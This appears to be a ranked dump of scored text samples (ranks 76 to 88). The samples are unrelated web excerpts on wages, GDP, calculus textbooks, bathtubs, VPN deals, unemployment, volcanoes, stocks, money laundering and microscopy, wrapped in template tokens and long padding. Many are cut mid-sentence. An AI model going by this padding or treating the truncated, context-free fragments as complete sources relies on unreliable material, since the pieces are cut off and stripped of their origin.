to wage growth that would be consistent with the Fed’s 2 percent overall price inflation target. Hourly wage growth has run at about 2 percent a year and, as we’ve discussed in great length, 2 percent hourly wage growth is far below the 3.5-4 percent target growth that is consistent with the Fed’s target of 2 percent price inflation and a 1.5 to 2.0 percent trend in productivity growth. + +Wage growth that exceeds this 3.5 to 4 percent target for a period of time is not an economic problem to be solved. Rather, it is a normal pattern of the labor share of corporate sector income finally recovering its pre Great Recession levels. If last month’s weak job growth is just a blip and healthy job growth continues in the next year, this should eventually lead to a labor market tight enough to finally provide workers with the bargaining power necessary to bid up their wages. + +There has been some discussion that the sluggish wage growth we’ve seen since the recovery began in 2009 is driven in large part by the mix of jobs being created, as if we have lower wages simply because the economy is adding more low-wage jobs. Earlier in the recovery there was likely some truth to this, as lower-wage sectors saw the first pickup in job growth. However, over the last year jobs have been created throughout the economy in high-, low-, and middle- wage sectors. The evidence suggests that the economy has been adding jobs in proportion to the rate that those jobs already exist in the economy. + +Let’s look at this by industrial sector. If we identify sectors as low-, middle-, and high-wage, there are several ways to cut the data. Here’s one way: + +The economy-wide average hourly wage in the first quarter of 2015 was $24.80. There are several industries with wages right around the average, and a couple obviously lower and a few obviously higher. + +So, now, let’s look at job creation. In the first quarter of 2014, low-wage jobs were 25.7 percent of the private sector economy. Over the last year, 26.6 percent of low-wage jobs added were in low-wage sectors. That looks relatively proportional. It’s a similar story at the middle and high ends of the wage-sector spectrum. Jobs are being added relatively in proportion to their share +================================================================================ +Rank = 76; Score = 958464.0 +<|begin_of_text|>We've mentioned a few times today that GDP went negative primarily because of the big drop in defense spending. + +But we didn't realize just how historic the drop was. + +JPMorgan economist Michael Feroli put it in context. The defense spending drop happened at the fastest pace in 40 years. As you can see in the chart below, the last time we had a faster drop was in 1972. + +Below is Feroli's take: + +Real GDP contracted at a 0.1% annual rate last quarter -- a disconcerting headline number which masked better underlying performance of the economy. The weakness in Q4 output was primarily driven by two factors: a 22% annualized drop in defense spending -- the most in forty years -- and a pullback in the pace of inventory accumulation, in part due to lingering effects of the drought. Absent these two factors the rest of the economy expanded at a relatively decent 2.5% pace last quarter. + +Foreign trade subtracted another 0.3%-point from growth in Q4. + +The two main components of private domestic demand, consumption and business fixed investment, actually accelerated last quarter, as consumers increased real outlays at a 2.2% rate and capital spending rebounded to an 8.4% growth pace. + +Odd as it may sound, today's number actually leaves the economy relatively well-positioned heading into the first quarter; the slowing in the pace of inventory accumulation (real inventories were only built up at a $20.0 billion rate in Q4) means that businesses will not have to pull back on production as much in Q1 if consumer spending does downshift in response to the recent tax increases. + +We continue to look for growth this quarter of around 1.0%, with modest upside risk due to the lean inventory situation and the decent momentum in private final demand. + +Here's the chart: + +Bloomberg, Business Insider + +Click here for all of the details of today's GDP release ><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +================================================================================ +Rank = 77; Score = 950272.0 +<|begin_of_text|>Several fundamental ideas in calculus are more than 2000 years old. As a formal subdiscipline of mathematics, calculus was first introduced and developed in the late 1600s, with key independent contributions from Sir Isaac Newton and Gottfried Wilhelm Leibniz. Mathematicians agree that the subject has been understood rigorously since the work of Augustin Louis Cauchy and Karl Weierstrass in the mid 1800s when the field of modern analysis was developed, in part to make sense of the infinitely small quantities on which calculus rests. Hence, as a body of knowledge calculus has been completely understood by experts for at least 150 years. The discipline is one of our great human intellectual achievements: among many spectacular ideas, calculus models how objects fall under the forces of gravity and wind resistance, explains how to compute areas and volumes of interesting shapes, enables us to work rigorously with infinitely small and infinitely large quantities, and connects the varying rates at which quantities change to the total change in the quantities themselves.While each author of a calculus textbook certainly offers her own creative perspective on the subject, it is hardly the case that many of the ideas she presents are new. Indeed, the mathematics community broadly agrees on what the main ideas of calculus are, as well as their justification and their importance; the core parts of nearly all calculus textbooks are very similar. As such, it is our opinion that in the 21st century – an age where the internet permits seamless and immediate transmission of information – no one should be required to purchase a calculus text to read, to use for a class, or to find a coherent collection of problems to solve. Calculus belongs to humankind, not any individual author or publishing company. Thus, the main purpose of this work is to present a new calculus text that is free. In addition, instructors who are looking for a calculus text should have the opportunity to download the source files and make modifications that they see fit; thus this text is open-source. Since August 2013, Active Calculus has been endorsed by the American Institute of Mathematics and its Open Textbook Initiative<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +================================================================================ +Rank = 78; Score = 942080.0 +<|begin_of_text|>Private cast iron bathtubs with porcelain interiors on "claw foot" pedestals rose to popularity in the 19th century + +A bathtub, bath, or tub (informal) is a large or small container for holding water in which a person or animal may bathe. Most modern bathtubs are made of thermoformed acrylic, porcelain enameled steel, fiberglass-reinforced polyester, or porcelain enameled cast iron. A bathtub is usually placed in a bathroom either as a stand-alone fixture or in conjunction with a shower. + +Modern bathtubs have overflow and waste drains and may have taps mounted on them. They are usually built-in, but may be free-standing or sometimes sunken. Until recently, most bathtubs were roughly rectangular in shape, but with the advent of acrylic thermoformed baths, more shapes are becoming available. Bathtubs are commonly white in colour, although many other colours can be found. The process for enamelling cast iron bathtubs was invented by the Scottish-born American David Dunbar Buick. + +Two main styles of bathtub are common: + +Western style bathtubs in which the bather lies down. These baths are typically shallow and long. + +Eastern style bathtubs in which the bather sits up. These are known as furo in Japan and are typically short and deep. + +History of bathtubs and bathing [ edit ] + +Traditional bathtub (19th century) from Italy + +Documented early plumbing systems for bathing go back as far as around 3300 BC with the discovery of copper water pipes beneath a palace in the Indus Valley Civilization of ancient India; see sanitation of the Indus Valley Civilization.[citation needed] Evidence of the earliest surviving personal sized bath tub was found on the Isle of Crete where a 1.5-metre (5 ft) long pedestal tub was found built from hardened pottery.[1] + +The clawfoot tub, which reached the apex of its popularity in the late 19th century; had its origins in the mid 18th century, where the ball and claw design originated in Holland, possibly artistically inspired by the Chinese motif of a dragon holding a precious stone. The design spread to England where it found much popularity among the aristocracy, just as bathing was becoming increasingly fashionable. Early bathtubs in England tended to be made of cast iron, or even tin and copper with a face of paint applied that tended to peel with time. + +The Scottish-born inventor David Buick invented a process for bonding porcelain enamel to cast iron in the +================================================================================ +Rank = 79; Score = 933888.0 +<|begin_of_text|>The service sector is in expansion for the second straight month, with the diffusion index sitting at 53. Anything over 50 is in expansion. Let's take a look at some tables from the February 2010 Non-Manufacturing ISM Report On Business®. + +* Non-Manufacturing ISM Report On Business® data is seasonally adjusted for Business Activity, New Orders, Prices and Employment. Manufacturing ISM Report On Business® data is seasonally adjusted for New Orders, Production, Employment, Supplier Deliveries and Inventories. + +** Number of months moving in current direction + +NMI (Non-Manufacturing Index) + +In February, the NMI registered 53 percent, indicating growth in the non-manufacturing sector for the second consecutive month. A reading above 50 percent indicates the non-manufacturing sector economy is generally expanding; below 50 percent indicates the non-manufacturing sector is generally contracting. + +NMI HISTORY + +INDUSTRY PERFORMANCE (Based on the NMI) + +The nine industries reporting growth in February based on the NMI composite index — listed in order — are: Information; Arts, Entertainment & Recreation; Transportation & Warehousing; Public Administration; Professional, Scientific & Technical Services; Other Services; Retail Trade; Wholesale Trade; and Finance & Insurance. + +The eight industries reporting contraction in February — listed in order — are: Educational Services; Health Care & Social Assistance; Management of Companies & Support Services; Construction; Utilities; Accommodation & Food Services; Real Estate, Rental & Leasing; and Mining. + +City, State Cutbacks Coming + +In an amazingly candid appraisal of the sorry state of affairs in New Jersey, Governor Chris Christie laid it on the line in a speech to about 200 mayors at the New Jersey League of Municipalities. + +The speech is 24 minutes long and well worth a listen because it is both an honest admission of the problem, and a refreshingly accurate appraisal of what the solutions are. He chastised the legislature, unions, municipalities, and affordable housing initiatives while promising to do something about all of those. + +Points Covered + +He froze aid to schools + +Challenged school boards. + +Wants to change arbitration rules for public workers + +Requests public-private salary and benefits parity + +Demands pension reform + +Property tax hikes not an option + +Wants to get rid of programs like COAH + +Is not thinking about the next election + +15,000 Layoffs Coming In San Francisco + +As many as 15,000 unionized city workers are anticipating layoffs on Friday in part of a +================================================================================ +Rank = 80; Score = 929792.0 +<|begin_of_text|>Since free VPN services generally lack quality and reliability that a premium subscription offers, buying a cheap VPN service is the best option for users on budget. More so, free VPN services generally offer simple browser extensions that only secure browsing activities and do not protect other data. Cheap VPN services that we selected encrypt not only browsing activities, but offer a full VPN service to secure bitTorrent traffic, messaging, e-mail clients along with all communication tunneled through a device. + +Even though VPN subscription is generally not too expensive, prices typically vary from $3 to $15 on monthly subscriptions, and $30 to $150 on annual accounts. The pricing depends on a combination of factors such as a number of servers and protocols, desktop and mobile custom apps, speed and reliability, advanced protection features and more. And while there are plenty of cheap VPN providers, quality of service, reliability and trustworthiness is paramount. + +Having reviewed dozens of leading VPN services, we compiled a list of affordable VPN providers that, despite their cheap price, manage to deliver an excellent VPN protection to their users. + +Get 75% off NordVPN + +MONTHLY PRICE: 11.95 USD + +ANNUAL PRICE: 2.99 USD/mo + +Panama based NordVPN is one of the best security oriented VPN companies with amazingly fast infrastructure. NordVPN offers over 5,000 servers in 62 countries, dedicated & shared IP types, and 6 simultaneous logins. NordVPN has a Smart Play technology offering an encrypted connection to access geo-restricted content on Netflix, Hulu, Pandora, BBC iPlayer and similar services. NordVPN implemented a strict no logs privacy policy, offers double data encryption, obfuscation tools and other advanced security features. Their custom apps run on system startup include Kill Switch feature and DNS leak resolver to protect the user from unexpected data leaks. To read a full NordVPN review and get an annual discount click HERE. + +Get 81% off CyberGhost VPN + +MONTHLY PRICE: 12.99 USD + +ANNUAL PRICE: 2.50 USD/mo + +Romania based CyberGhost is a no logs VPN provider with over 3,500 high speed VPN servers. CyberGhost offers streaming servers to unblock Netflix, Hulu, BBC iPlayer as well as secure torrenting servers. For faster streaming and torrenting CyberGhost VPN allows switching between TCP/UDP protocols. VPN provider offers desktop and mobile apps with built-in advanced security features such as automatic kill switch, DNS & IP leaks, anti-fingerprinting and tracking protection +================================================================================ +Rank = 81; Score = 925696.0 +<|begin_of_text|>Generally, more democracy has a positive effect on the global economy. Freer people have the ability to buy, sell, and innovate as they please. But the political unrest in the Middle East is having a negative effect on the markets thus far. What makes those revolutions different? The Middle East is a major source of the world's oil. Political uncertainty in the region leads to oil supply uncertainty. For that reason the recent events in nations like Egypt and Libya have been worrying investors and businesses: if less oil flows out of the region to the rest of the world, fuel prices will rise. + +In fact, we're already seeing oil prices hit highs this week not seen in two-and-a-half years. These increases come after oil prices already began to rise moderately throughout much of 2010, as the global economy strengthened. High fuel costs could dampen global economic growth, since firms and consumers would be forced to spend more on energy. This effect could also thwart the recently strengthening U.S. economy. Here are ten ways rising oil prices endanger the recovery: + +Please use a JavaScript-enabled device to view this slideshow + +First, it's important to note that none of these ten factors are mutually exclusive. Indeed, many are complementary. It's not likely we would see consumer sentiment fall without the residential real estate market taking a hit, for example. That's why prolonged high oil prices are so dangerous -- they could create a domino effect that would poison many different aspects of the U.S. economy.<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +================================================================================ +Rank = 82; Score = 921600.0 +<|begin_of_text|>U.S. Unemployment Over Time (1990-2016) + +When we are talking about the unemployment rate as a barometer for the health of the economy, it’s most commonly the national figure that gets referenced. + +Historically, on a national level, an unemployment rate in the 4-6% range is generally considered “good”, while higher rates that fall within the 8-10% range are “bad”. Higher rates are usually only seen during times of recessions or crisis, when people around the country are struggling to find work. + +But, as you’ll see in today’s animated map, unemployment rates at the regional level are a very different thing. Today’s map, which comes to us from FlowingData, shows the disparity of unemployment rates in the U.S. based on county estimates, and how they have their own ebbs and flows. + +The Impact of a Crisis + +The most noticeable element of the animation is the “spread” of unemployment as a crisis hits. + +For reference, here’s the map during 1999 – which is around when income peaked for most Americans. + +Now here’s a map of the country during the height of the Financial Crisis in 2009. The “spread” of unemployment catches up to people in even the most economically isolated states. + +It goes to show that even people in largely rural counties couldn’t stay isolated from a crisis that originated on Wall Street. While it doesn’t affect them immediately, eventually the “creep” of unemployment hits their counties as well. + +One interesting exception to note here is North Dakota. With discoveries in the Bakken, and the fracking boom in full flight at the time, the state recorded the lowest rates of unemployment during the crisis. + +Today, while the oil boom has slowed because of a lower price environment, it’s true that unemployment is still relatively low at 2.8% in the state.<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +================================================================================ +Rank = 83; Score = 913408.0 +<|begin_of_text|>Supervolcanoes are volcanic eruptions thousands of times more powerful than normal volcanic eruptions. These types of eruptions cause significant local ecological disturbances and have profound effects on global climate. On the scale of geological time they occur quite frequently. + +Volcanologists categorize eruptions by the amount of volcanic ash ejected upon eruption using the Volcanic Explosivity Index (VEI). The VEI consists of 8 levels, with VEI-8 eruptions considered “supervolcanic eruptions” ejecting 1000 cubic kilometers of ash or more. + +Throughout human history our species has encountered one known supervolcanic eruption. This eruption occurred at Lake Toba in Indonesia approximately 74,000 years ago, potentially causing a genetic bottleneck and slowing human expansion into Asia and Australia. However, VEI-7 eruptions (eruptions ejecting 100 cubic kilometers of ash) have occurred with relative regularity (4 in the past 2,000 years). + +I recently interviewed University of Texas paleoecologist Dr. Robert Dull to discuss past major eruptions in human history. Dr. Dull studies climate change on millennial scales of time and discovered evidence that a major volcanic eruption occurred around 536 C.E. at Lake Ilopango in modern day El Salvador. He believes that this eruption is responsible for the well-documented extreme global weather events in 536-537 C.E. throughout the northern hemisphere. + +I believe that understanding how major eruptions effected human civilization in the past will give us an opportunity to prepare for these eruptions in the future. + +--- + +Cadell Last: How large was the Lake Ilopango eruption? + +Robert Dull: The Lake Ilopango eruption was a magnitude 6.9 eruption. The magnitude scale is more accurate that the VEI. Classifying the eruption as a 6.9 is obviously more precise than labeling it 6 or 7. But it was nearly a VEI-7. However, it wouldn’t take many new data points for that estimate to go up. The more samples we collect the better we will be able to figure out the full volume of the eruption. The magma volume was approximately 39 cubic kilometers. + +Cadell Last: Are there estimates on how many people were directly killed as a result of the Ilopango eruption? If so, how were they estimated? + +Robert Dull: Between 40,000-80,000 people died during the Lake Ilopango eruption. We used population density assumptions based on settlement patterns in +================================================================================ +Rank = 84; Score = 913408.0 +<|begin_of_text|>U.S. stocks closed lower Thursday, capping the worst year for the market since 2008. + +The Standard & Poor’s 500 index ended essentially flat for the year after the day’s modest losses nudged it into the red for 2015. Even factoring in dividends, the index eked out a far smaller return than in 2014. + +The Dow Jones industrial average also closed out the year with a loss. The tech-heavy Nasdaq composite fared better, delivering a gain for the year. + +“It’s a lousy end to a pretty lousy year,” said Edward Campbell, portfolio manager for QMA, a unit of Prudential Investment Management. “A very unrewarding year.” + +The Dow ended the day down 178.84 points, or 1.02 percent, to 17,425.03. The S&P 500 index lost 19.42 points, or 0.9 percent, to 2,043.94. The Nasdaq composite fell 58.44 points, or 1.2 percent, to 5,007.41. + +For 2015, the Dow registered a loss of 2.2 percent. It’s the first down year for the Dow since 2008. The Nasdaq ended with a gain of 5.7 percent. + +The S&P 500 index, regarded as a benchmark for the broader stock market, lost 0.7 percent for the year. According to preliminary calculations, the index had a total return for the year of just 1.4 percent, including dividends. That’s the worst return since 2008 and down sharply from the 13.7 percent it returned in 2014. + +While U.S. employers added jobs at a solid pace in 2015 and consumer confidence improved, several factors weighed on stocks in 2015. Investors worried about flat earnings growth, a deep slump in oil prices and the impact of the stronger dollar on revenues in markets outside the U.S. They also fretted about the timing of the Federal Reserve’s first interest rate hike in more than a decade. + +Crude oil recovered some of its losses from the day before. Benchmark U.S. crude climbed 44 cents to close at $37.04 a barrel in New York. Brent crude, used to price international oils, gained 82 cents to close at $37.28 a barrel in London.<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +================================================================================ +Rank = 85; Score = 913408.0 +<|begin_of_text|>CHENNAI: The Enforcement Directorate, which enforces the Prevention of Money Laundering Act (PMLA), has provisionally attached properties worth Rs 12,000 crore in the last 15 months, believed to be the proceeds of laundered money, data released by the government shows. This is more than what the department attached in the decade from 2005.In a written reply to an unstarred question on Friday, minister of state for finance Santosh Kumar Gangwar said that in the last one year, properties worth Rs 11,032.27 crore were attached by the ED after issuing 175 Provisional Attachment Orders (PAO). In comparison, the total value of assets attached from 2005-2015 was Rs 9003.26 crore, statistics on ED website show. In the first three months of the current financial year, Rs 965.84 crore has been attached. The total cumulative attachments would be around Rs 22,000 crore as of June 30 this year, said sources in the department. The figures of properties attached in 2016-17 zoomed due to the Vijay Mallya case, in which properties worth close to Rs 10,000 crore were attached, sources said.More than half of the total searches and a third of the total arrests by the department across the country were effected in the last 15 months, statistics show. Some of these highprofile cases and searches were in Tamil Nadu; for instance the Sekhar Reddy case and Madurai granite mining. The ED is an organisation which goes after big names accused of corruption. The PMLA is a stringent law, where the onus is on the accused to prove that the attached properties are bought from known sources of income, say sources. The ED has been given a free hand to dig up dirty money, said sources. This, they added, reflected in the figures.Sources in the department said that these measures were taken in coordination with other investigative agencies like Income Tax Investigation Wing and Central Bureau of Investigation (CBI). A task force on shell companies had been created by the ministry of corporate affairs which involves all these departments. The ED is tracking shell companies through which crores of rupees are transferred out of the country. In April, ED sleuths arrested in Chennai a 36-year-old man who had allegedly routed Rs 78 crore through six shell companies.As of July 12, 1.62 lakh shell companies had been struck off the Registrar of Companies (RoC). +================================================================================ +Rank = 86; Score = 909312.0 +<|begin_of_text|>Natural number + +1,000,000,000 (one billion, short scale; one thousand million or milliard, yard,[1] long scale) is the natural number following 999,999,999 and preceding 1,000,000,001. One billion can also be written as b or bn.[2][3] + +In scientific notation, it is written as 1 × 109. The metric prefix giga indicates 1,000,000,000 times the base unit. Its symbol is G. + +One billion years may be called eon/aeon in astronomy or geology. + +Previously in British English (but not in American English), the word "billion" referred exclusively to a million millions (1,000,000,000,000). However, this is no longer common, and the word has been used to mean one thousand million (1,000,000,000) for several decades.[4] + +The term milliard can also be used to refer to 1,000,000,000; whereas "milliard" is seldom used in English,[5] variations on this name often appear in other languages. + +In the South Asian numbering system, it is known as 100 crore or 1 arab. + +Visualization of powers of ten from one to 1 billion + +Sense of scale [ edit ] + +The facts below give a sense of how large 1,000,000,000 (109) is in the context of time according to current scientific evidence: + +Time [ edit ] + +10 9 seconds is 114 days short of 32 calendar years (≈ 31.7 years). + +seconds is 114 days short of 32 calendar years (≈ 31.7 years). More precisely, a billion seconds is exactly 31 years, 8 months, 2 weeks, 1 day, 17 hours, 46 minutes, and 40 seconds. + +About 10 9 minutes ago, the Roman Empire was flourishing and Christianity was emerging. (10 9 minutes is roughly 1,901 years.) + +minutes ago, the Roman Empire was flourishing and Christianity was emerging. (10 minutes is roughly 1,901 years.) About 10 9 hours ago, modern human beings and their ancestors were living in the Stone Age (more precisely, the Middle Paleolithic). (10 9 hours is roughly 114,080 years.) + +hours ago, modern human beings and their ancestors were living in the Stone Age (more precisely, the Middle Paleolithic). (10 hours +================================================================================ +Rank = 87; Score = 909312.0 +<|begin_of_text|>By David Hargreaves + +Well, the Reserve Bank was looking for hard evidence of a reheating Auckland housing market and it's getting it, in spades. + +What the central bank actually intends to do about the problem will be occupying many minds in many places both within and without the RBNZ at the moment. + +To me it's looking increasingly likely that the RBNZ will unleash new weaponry either in conjunction with, or maybe just before, its next Financial Stability Report (FSR) on May 13. + +My colleague Gareth Vaughan produced this summary earlier in the year of some of the likely options the RBNZ might dip into to slow the housing market. I've got a few more thoughts on this that I'm sharing further down in this article. + +But, first, a little background: + +In what could be termed his annual scene-setting speech, on February 4, the RBNZ Governor Graeme Wheeler made extensive reference to the housing market, with the slightly, I thought, ominous observation that the central bank would "be talking more about the housing market over the next few months". + +Wheeler noted that house price inflation slowed last year as the restrictions on high loan to value lending, introduced by the RBNZ in 2013, coupled with four hikes in official interest rates, helped to constrain demand. But this demand now appeared to be increasing again in Auckland due to rising household incomes, falling interest rates on fixed- rate mortgages, strong migration inflows and continued market tightness. + +The RBNZ would have a "clearer assessment" when the February/March Real Estate Institute (REINZ) data was available. + +In other words, the RBNZ thought there was a problem, but it wanted to see the smoking gun before firing off its own weapons. + +Auckland houses moving + +Okay, so we haven't yet seen the REINZ figures for March. But the February ones showed Auckland median prices up 14% on the figures recorded 12 months earlier. More tellingly, the REINZ Stratified Price Index, which adjusts for some of the variations in the mix that can affect the median price, registered an eyebrow-raising 6.4% gain in Auckland over just three months. + +As far as March was concerned, the essential thrust of those REINZ figures has been backed up by the latest data both from QV and from Realestate.co.nz. + +What is becoming more and more clear - and there are interesting nationwide implications - is the extent to which a heated housing +================================================================================ +Rank = 88; Score = 892928.0 +<|begin_of_text|>Most measuring instruments are limited by the tradeoff between how precisely and how rapidly a measurement is made: the more precise the measurement, the longer it takes. But because many phenomena occurring at the nanoscale are both rapid and tiny, they demand a measuring system that can capture their precise details in both time and space. + +Taking up that challenge, researchers at the National Institute of Standards and Technology (NIST) have redesigned the detection system at the heart of the atomic force microscope (AFM). A premier tool of the nanoworld, the AFM uses a small probe, or tip, to map the submicroscopic hills and valleys that define the surface of materials, along with other properties, at the nanometer scale. Although the AFM has already revolutionized the understanding of nanostructures, scientists are now eager to study nanoscale phenomena, such as the folding of proteins or the diffusion of heat, which happen too quickly and generate changes too small to be accurately measured by existing versions of the microscope. + +By fabricating an extremely lightweight AFM probe and combining it with a nanoscale device that converts minuscule deflections of the probe into large changes of an optical signal inside a waveguide, the NIST researchers have broken new ground: Their AFM system measures rapid changes in structure with high precision. + +Illustration of a newly fabricated atomic force microscope (AFM) probe integrated with an 